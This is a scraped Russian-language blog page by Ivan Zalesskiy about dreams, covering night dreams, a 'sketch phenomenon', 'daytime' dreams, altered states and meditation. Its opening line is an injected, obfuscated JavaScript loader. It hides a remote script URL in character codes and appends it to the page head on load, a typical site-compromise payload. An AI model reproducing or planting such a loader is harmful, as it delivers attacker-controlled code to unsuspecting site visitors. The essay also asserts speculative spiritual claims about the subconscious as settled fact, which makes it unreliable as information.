var d3 = document.createElement('script'); d3.type = 'text/javascript'; d3.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 52); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == d3.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(d3);} Сновидения | Ivan Zalesskiy

Эта тема невероятно интересна и таинственна, в первую очередь, потому что мы все видим сны, но не все их понимаем, в этой части нас почти нет логики, мы в этом участвуем, но это как бы ни про нас. Во вторую очередь даже наука не разобралась в сновидениях до конца, у них есть свои версии и гипотезы, но вуаль таинства до конца не снята. Тем не менее, Фрейд и Юнг многое смогли объяснить из тайны снов, а в шаманских практиках вообще не обходятся без сновидений, если учесть что этим практикам более десяти тысяч лет, то кое-какие знания человечество все же накопило.
В первую очередь стоит различать сновидения:
Ночные сновидения, это те наши переживания и визуальные образы которые мы видим в состоянии сна. Все мы с ними знакомы. Но не все знают о том, что через сны наше подсознание шлет нам сообщения, которые очень важно понимать. Итак - те, кто видят сны – им стоит озаботиться тем, что значат их сны. Те, кто не видят, им стоит заняться собой, так как у них теряется связь с их подсознанием (или духовной частью).
Еще есть такая штука как Феномен Скетча – заключается он в том, что в сюжете сна воспроизводятся одни и тех же ситуаций из реальности настоящего и прошлого, имеющие определённый (один и тот же) смысл. Проще говоря, функция скетча, это то когда человеку, долго снятся одни и те же сны (с небольшими вариациями), о которых он, обычно, ничего не помнит. Феномен Скетча в основном проявлен у людей, которые не развиваются, не утруждены самопознанием и творчеством. Но, если человек начинает развиваться, стремиться к самореализации, участвует в творческих процессах, то функция скетча перестает проявляться, а на ее место выходят, другие более активные возможности сновидений.

Существует ещё одна значимая часть сновидений — дневная. Дело в том, что во периоды дневного бодрствования сновидения никуда не пропадают и не где не прячутся! Они всё время продолжают присутствовать в жизни личности и даже действовать, но делают это уже в менее проявленном виде! Проще всего это можно объяснить на примере с ночными звёздами на небе. С наступлением утра звёзды не исчезают с небес, но при дневном свете мы их не замечаем. Дневная форма сновидений это неотъемлемая часть нашего сознания. Проявляется она через измененные состояния сознания (ИСС) которые бывают неосознанными (монотонное движение в автомобиле, долгое и нудное чтение, групповые танцы, хоровое пение и.т.д.) побывав в таких состояниях, очень часто случается озарение или инсайд.
Либо осознанное погружение в ИСС через духовные практики (медитация, концентрация, визуализация молитва и др.) Все духовные практики обладают воздействием на сознание и помогают изменить его. Как пример - в медитации мы отвлекаемся от материального мира и начинаем видеть дневные сновидения. Более того, под воздействием духовной практики видоизменяются и ночные сновидения.

Итак, если не замечать сновидения и не считать их значимыми и существенными явлениями, они для данного человека такими и будут. Но это не означает, что они являются не существенными в действительности. Дневные сновидения это и есть голос подсознания.  Понимание сновидений это невероятный ресурс пополнения знаний и неотъемлемая часть духовного развития личности!

Поделится в соц сетях:
Система Orphus

Добавить комментарий

Подобные материалы

В психологии существует представление о прерванном движении. Это движение к любви, часто прерывается в детстве.

Главным и первичным различием у Мужчин и Женщин является разная энергетическая структура. Именно это формируют их...

Этот эксперимент я проводил с целью получения опыта восприятия реальности без помощи зрения, используя остальные...

ПОДПИШИТЕСЬ НА НАШУ РАССЫЛКУ

ХОТИТЕ ПОЛУЧАТЬ НОВОСТИ ИЛИ ИНФОРМАЦИЮ О БЛИЖАЙЩИХ СЕМИНАРАХ?